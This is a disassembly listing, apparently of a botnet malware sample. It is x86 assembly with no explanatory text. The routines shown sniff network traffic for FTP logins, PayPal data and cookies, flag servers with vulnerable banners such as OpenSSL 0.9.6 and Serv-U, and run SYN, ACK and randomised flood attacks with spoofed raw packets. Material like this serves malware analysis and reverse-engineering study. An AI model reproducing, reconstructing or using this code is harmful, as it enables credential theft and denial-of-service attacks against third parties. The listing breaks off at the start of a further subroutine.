loc_412FF7: ; CODE XREF: sub_412FA6+4B�j
push offset a230 ; "230 "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412FF3
push offset aUser_2 ; "USER "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_412FF3
push offset aPass_0 ; "PASS "
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412FA6 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41302D(char *Str)
sub_41302D proc near ; CODE XREF: sub_413119+35F�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aHttpSniff ; "HTTP sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_413047
loc_413043: ; CODE XREF: sub_41302D+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_413047: ; CODE XREF: sub_41302D+14�j
push offset aPiavnc ; "##piavnc##"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413043
push offset aPaypal ; "paypal"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_41306D
loc_413069: ; CODE XREF: sub_41302D+4F�j
; sub_41302D+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_41306D: ; CODE XREF: sub_41302D+3A�j
push offset aPaypal_0 ; "PAYPAL"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413069
push offset aPaypal_com ; "PAYPAL.COM"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413069
push offset aPaypal_com_0 ; "paypal.com"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_413069
push offset aSetCookie ; "Set-Cookie:"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_41302D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4130B4(char *Str)
sub_4130B4 proc near ; CODE XREF: sub_413119:loc_4134DE�p
Str = dword ptr 4
push esi
mov esi, [esp+4+Str]
push offset aVulnSniff ; "VULN sniff"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4130CE
loc_4130CA: ; CODE XREF: sub_4130B4+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_4130CE: ; CODE XREF: sub_4130B4+14�j
push offset aPiavnc ; "##piavnc##"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_4130CA
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jz short loc_4130F4
loc_4130F0: ; CODE XREF: sub_4130B4+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4130F4: ; CODE XREF: sub_4130B4+3A�j
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
jnz short loc_4130F0
push offset aOpenssh_2 ; "OpenSSH_2"
push esi ; Str
call _strstr
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_4130B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413119 proc near ; DATA XREF: sub_401CC7+42FB�o
Dst = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
var_113A4 = dword ptr -113A4h
Str = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
var_3B8 = byte ptr -3B8h
var_3B7 = byte ptr -3B7h
Dest = byte ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 113B8h
call __alloca_probe
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+var_B8]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_3B7]
push 3Fh
mov [eax+90h], esi
pop ecx
xor eax, eax
mov [ebp+var_3B8], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_3B8]
mov [ebp+var_20], 2
push eax
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call dword_4E4234 ; gethostname
lea eax, [ebp+var_3B8]
push eax
call dword_4E42A4 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx ; Size
push dword ptr [eax] ; Src
lea eax, [ebp+var_8]
push eax ; Dst
call _memcpy
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx
push 3
push 2
call dword_4E42A0 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_4131BF
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4131BF: ; CODE XREF: sub_413119+9B�j
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call dword_4E424C ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_413235
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44DA7C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_413211
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409D6C
add esp, 14h
loc_413211: ; CODE XREF: sub_413119+D6�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
push edi
call dword_4E42B8 ; closesocket
push [ebp+var_34]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_413235: ; CODE XREF: sub_413119+B6�j
push ebx
lea eax, [ebp+var_24]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_C], esi
call dword_4E41CC ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4132BB
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44DAA8 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_413297
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409D6C
add esp, 14h
loc_413297: ; CODE XREF: sub_413119+15C�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
pop ecx
push edi
call dword_4E42B8 ; closesocket
push [ebp+var_34]
call sub_40BAAA
pop ecx
push ebx
call ds:dword_4F63D4 ; ExitThread
loc_4132BB: ; CODE XREF: sub_413119+13C�j
mov esi, 200h
loc_4132C0: ; CODE XREF: sub_413119+1D6�j
; sub_413119+1FB�j ...
mov edi, 0FFFFh
lea eax, [ebp+Dst]
push edi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push edi
push eax
push [ebp+var_10]
call dword_4E4238 ; recv
cmp [ebp+var_113AF], 6
jnz short loc_4132C0
push [ebp+var_113A4]
mov edi, ds:dword_4F6534
call edi ; htons
push [ebp+var_113A4+2]
movzx eax, ax
mov [ebp+arg_0], eax
call edi ; htons
cmp [ebp+arg_0], 6Eh
movzx edi, ax
jz short loc_4132C0
cmp [ebp+arg_0], 19h
jz short loc_4132C0
cmp edi, 6Eh
jz short loc_4132C0
cmp edi, 19h
jz short loc_4132C0
push [ebp+var_113AC]
call sub_412E0A
pop ecx
push dword ptr [eax]
call ds:dword_4F6538 ; inet_ntoa
push eax
lea eax, [ebp+var_13B8]
push offset aS_35 ; "%s"
push eax ; Dest
call _sprintf
push [ebp+var_113A8]
call sub_412E0A
add esp, 10h
push dword ptr [eax]
call ds:dword_4F6538 ; inet_ntoa
push eax
lea eax, [ebp+var_BB8]
push offset aS_36 ; "%s"
push eax ; Dest
call _sprintf
lea eax, [ebp+Str]
mov [ebp+var_4], ebx
push eax ; Str
call _strlen
add esp, 10h
test eax, eax
jle short loc_4133BE
loc_41338A: ; CODE XREF: sub_413119+2A3�j
mov eax, [ebp+var_4]
cmp [ebp+eax+Str], 0Dh
lea eax, [ebp+eax+Str]
jnz short loc_4133A1
mov byte ptr [eax], 20h
loc_4133A1: ; CODE XREF: sub_413119+283�j
cmp byte ptr [eax], 0Ah
jnz short loc_4133A9
mov byte ptr [eax], 20h
loc_4133A9: ; CODE XREF: sub_413119+28B�j
inc [ebp+var_4]
lea eax, [ebp+Str]
push eax ; Str
call _strlen
cmp [ebp+var_4], eax
pop ecx
jl short loc_41338A
loc_4133BE: ; CODE XREF: sub_413119+26F�j
cmp [ebp+arg_0], 50h
jz loc_413471
cmp edi, 50h
jz loc_413471
lea eax, [ebp+Str]
push eax ; Str
call sub_412E19
test al, al
pop ecx
jz short loc_413405
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_44DAE0
jmp loc_4134A0
; ---------------------------------------------------------------------------
loc_413405: ; CODE XREF: sub_413119+2C7�j
cmp edi, 50h
jz short loc_413471
lea eax, [ebp+Str]
push eax ; Str
call sub_412F30
test al, al
pop ecx
jz short loc_41343B
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_44DB14
jmp short loc_4134A0
; ---------------------------------------------------------------------------
loc_41343B: ; CODE XREF: sub_413119+300�j
cmp edi, 50h
jz short loc_413471
lea eax, [ebp+Str]
push eax ; Str
call sub_412FA6
test al, al
pop ecx
jz short loc_413471
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_44DB48
jmp short loc_4134A0
; ---------------------------------------------------------------------------
loc_413471: ; CODE XREF: sub_413119+2A9�j
; sub_413119+2B2�j ...
lea eax, [ebp+Str]
push eax ; Str
call sub_41302D
test al, al
pop ecx
lea eax, [ebp+Str]
push eax
jz short loc_4134DE
lea eax, [ebp+var_BB8]
push edi
push eax
lea eax, [ebp+var_13B8]
push [ebp+arg_0]
push eax
push offset asc_44DB7C ; "-"
loc_4134A0: ; CODE XREF: sub_413119+2E7�j
; sub_413119+320�j ...
lea eax, [ebp+Dest]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 20h
cmp [ebp+var_2C], ebx
jnz loc_4132C0
push ebx ; int
lea eax, [ebp+Dest]
push [ebp+var_30] ; int
push eax ; int
lea eax, [ebp+var_B4]
push eax ; Str
push [ebp+var_B8] ; int
call sub_409D6C
add esp, 14h
jmp loc_4132C0
; ---------------------------------------------------------------------------
loc_4134DE: ; CODE XREF: sub_413119+36E�j
call sub_4130B4
test al, al
pop ecx
jz loc_4132C0
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_44DBB4
jmp short loc_4134A0
sub_413119 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41350C proc near ; DATA XREF: sub_401CC7+6694�o
Dest = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = dword ptr -18Ch
Str = byte ptr -10Ch
Str1 = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_4F63B0 ; GetTickCount
push eax ; Seed
call _srand
lea eax, [ebp+var_18C]
push eax ; int
lea eax, [ebp+Str1]
push eax ; Str1
lea eax, [ebp+var_20C]
push eax ; Str
lea eax, [ebp+var_28C]
push eax ; int
call sub_4138F8
add esp, 14h
push eax
lea eax, [ebp+Dest]
push offset asc_44DBEC ; "-"
push eax ; Dest
call _sprintf
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_41359F
push esi ; int
lea eax, [ebp+Dest]
push [ebp+var_C] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_294] ; int
call sub_409D6C
add esp, 14h
loc_41359F: ; CODE XREF: sub_41350C+71�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_290]
call sub_40BAAA
pop ecx
pop ecx
push esi
call ds:dword_4F63D4 ; ExitThread
pop edi
pop esi
sub_41350C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4135C1(int,int,char *Str1,int,int)
sub_4135C1 proc near ; CODE XREF: sub_4138F8+40�p
var_284 = byte ptr -284h
Dest = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
Dst = byte ptr -8Ch
Src = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str1 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_4E4190 ; WSAStartup
test eax, eax
jz short loc_413601
xor eax, eax
jmp loc_4138F4
; ---------------------------------------------------------------------------
loc_413601: ; CODE XREF: sub_4135C1+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_4E42C4 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4138EC
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call dword_4E4200 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4138E2
push [ebp+arg_C]
mov [ebp+var_58], 2
call dword_4E4220 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call dword_4E4220 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call dword_4E4220 ; htons
mov [ebp+var_12], ax
call _rand
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_4E4220 ; htons
push 12345678h
mov [ebp+var_14], ax
call dword_4E421C ; htonl
push offset aDdos_syn_0 ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4136D1
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_413725
; ---------------------------------------------------------------------------
loc_4136D1: ; CODE XREF: sub_4135C1+105�j
push offset aDdos_ack_0 ; "ddos.ack"
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4136ED
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_413725
; ---------------------------------------------------------------------------
loc_4136ED: ; CODE XREF: sub_4135C1+121�j
push offset aDdos_random_0 ; "ddos.random"
push [ebp+Str1] ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_413725
call _rand
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call _rand
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_413725: ; CODE XREF: sub_4135C1+10E�j
; sub_4135C1+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call dword_4E4220 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+Str1], ebx
call ds:dword_4F62F8 ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_4F643C ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call __allmul
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_413773: ; CODE XREF: sub_4135C1+2E2�j
; sub_4135C1+2F0�j
mov [ebp+var_4], bx
call _rand
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_4E4220 ; htons
mov [ebp+var_14], ax
call _rand
mov edi, eax
shl edi, 10h
call _rand
or edi, eax
push edi
call dword_4E4220 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_4E421C ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_4E4220 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+Src], eax
lea eax, [ebp+Src]
push 20h ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_94]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40B002
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
lea eax, [ebp+var_14]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_A0]
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40B002
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi ; Size
push eax ; Src
lea eax, [ebp+var_B4]
push eax ; Dst
call _memcpy
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call dword_4E4284 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4138B6
add [ebp+Str1], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_4F643C ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4138DF
jl loc_413773
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4138DF
jmp loc_413773
; ---------------------------------------------------------------------------
loc_4138B6: ; CODE XREF: sub_4135C1+2CB�j
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44DC38 ; "-"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
push eax
call sub_415C77
add esp, 10h
jmp short loc_4138E2
; ---------------------------------------------------------------------------
loc_4138DF: ; CODE XREF: sub_4135C1+2E0�j
; sub_4135C1+2EE�j
mov ebx, [ebp+Str1]
loc_4138E2: ; CODE XREF: sub_4135C1+78�j
; sub_4135C1+31C�j
push [ebp+var_20]
call dword_4E42B8 ; closesocket
pop esi
loc_4138EC: ; CODE XREF: sub_4135C1+5B�j
call dword_4E4178 ; WSACleanup
mov eax, ebx
loc_4138F4: ; CODE XREF: sub_4135C1+3B�j
pop edi
pop ebx
leave
retn
sub_4135C1 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4138F8(int,char *Str,char *Str1,int)
sub_4138F8 proc near ; CODE XREF: sub_41350C+4F�p
arg_0 = dword ptr 4
Str = dword ptr 8
Str1 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AE8D
push [esp+10h+Str] ; Str
mov esi, eax
call _atoi
push [esp+14h+arg_C] ; Str
mov ebx, eax
call _atoi
mov edi, eax
call _rand
cdq
mov ecx, 200h
push edi ; int
idiv ecx
push ebx ; int
push [esp+20h+Str1] ; Str1
lea eax, [edx+esi+100h]
push eax ; int
push esi ; int
call sub_4135C1
add esp, 20h
test eax, eax
jnz short loc_413947
push 1
pop eax
loc_413947: ; CODE XREF: sub_4138F8+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4138F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413956 proc near ; DATA XREF: sub_401CC7+6873�o
Dest = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
Str = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
Dst = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call dword_4E42A0 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4139F1
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44DC54 ; "-"
push eax ; Dest
call _sprintf
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_4139D4
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D6C
add esp, 14h
loc_4139D4: ; CODE XREF: sub_413956+5C�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_38]
call sub_40BAAA
pop ecx
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
loc_4139F1: ; CODE XREF: sub_413956+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call dword_4E4200 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_413A68
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+Dest]
push offset asc_44DC80 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_413A4B
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D6C
add esp, 14h
loc_413A4B: ; CODE XREF: sub_413956+D3�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_38]
call sub_40BAAA
pop ecx
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
loc_413A68: ; CODE XREF: sub_413956+B3�j
lea eax, [ebp+var_1B8]
push eax
call dword_4E4260 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_413ACF
lea eax, [ebp+Dest]
push offset asc_44DCB0 ; "-"
push eax ; Dest
call _sprintf
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_413AB2
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D6C
add esp, 14h
loc_413AB2: ; CODE XREF: sub_413956+13A�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_38]
call sub_40BAAA
pop ecx
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
loc_413ACF: ; CODE XREF: sub_413956+122�j
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push edi
call dword_4E4220 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_4E4260 ; inet_addr
mov esi, ds:dword_4F63B0
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_413B0D: ; CODE XREF: sub_413956+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_413CB8
push 41Ch
mov byte_4E6FD8, 45h
call dword_4E4220 ; htons
cmp [ebp+var_2C], edi
mov word_4E6FDA, ax
mov word_4E6FDC, bx
mov word_4E6FDE, di
mov byte_4E6FE0, 80h
mov byte_4E6FE1, bl
mov word_4E6FE2, di
jz short loc_413B93
call _rand
mov ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
shl ebx, 8
call _rand
add ebx, eax
push 1
mov dword_4E6FE4, ebx
pop ebx
jmp short loc_413BAB
; ---------------------------------------------------------------------------
loc_413B93: ; CODE XREF: sub_413956+20B�j
push [ebp+var_1BC]
call sub_40AFA9
pop ecx
push eax
call dword_4E4260 ; inet_addr
mov dword_4E6FE4, eax
loc_413BAB: ; CODE XREF: sub_413956+23B�j
mov eax, [ebp+var_18]
mov dword_4E6FE8, eax
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_4E6FEC, dl
call _rand
cdq
mov ecx, 100h
idiv ecx
mov byte_4E6FED, dl
call _rand
cdq
mov ecx, 0F0h
push 400h ; Size
idiv ecx
mov word_4E6FEE, di
mov word_4E6FF2, bx
inc edx
mov word_4E6FF0, dx
call _rand
cdq
mov ecx, 0FFh
idiv ecx
push edx ; Val
push offset dword_4E6FF4 ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push 10h
push eax
push edi
push 41Ch
push offset byte_4E6FD8
push [ebp+var_4]
call dword_4E4284 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_413C43
inc [ebp+arg_0]
jmp loc_413B0D
; ---------------------------------------------------------------------------
loc_413C43: ; CODE XREF: sub_413956+2E3�j
push [ebp+var_4]
call dword_4E42B8 ; closesocket
call dword_4E41B4 ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset asc_44DCD0 ; "-"
lea eax, [ebp+Dest]
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_413C9B
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D6C
add esp, 14h
loc_413C9B: ; CODE XREF: sub_413956+323�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_38]
call sub_40BAAA
pop ecx
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
loc_413CB8: ; CODE XREF: sub_413956+1C8�j
push [ebp+var_4]
call dword_4E42B8 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+Dest]
push offset asc_44DD18 ; "-"
push eax ; Dest
call _sprintf
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_413D20
push edi ; int
lea eax, [ebp+Dest]
push [ebp+var_28] ; int
push eax ; int
lea eax, [ebp+Str]
push eax ; Str
push [ebp+var_1BC] ; int
call sub_409D6C
add esp, 14h
loc_413D20: ; CODE XREF: sub_413956+3A8�j
lea eax, [ebp+Dest]
push eax
call sub_415C77
push [ebp+var_38]
call sub_40BAAA
pop ecx
pop ecx
push edi
call ds:dword_4F63D4 ; ExitThread
sub_413956 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_413D3D proc near ; DATA XREF: sub_401CC7+565D�o
var_10320 = byte ptr -10320h
Dest = byte ptr -344h
var_144 = dword ptr -144h
Str = byte ptr -140h
var_C0 = byte ptr -0C0h
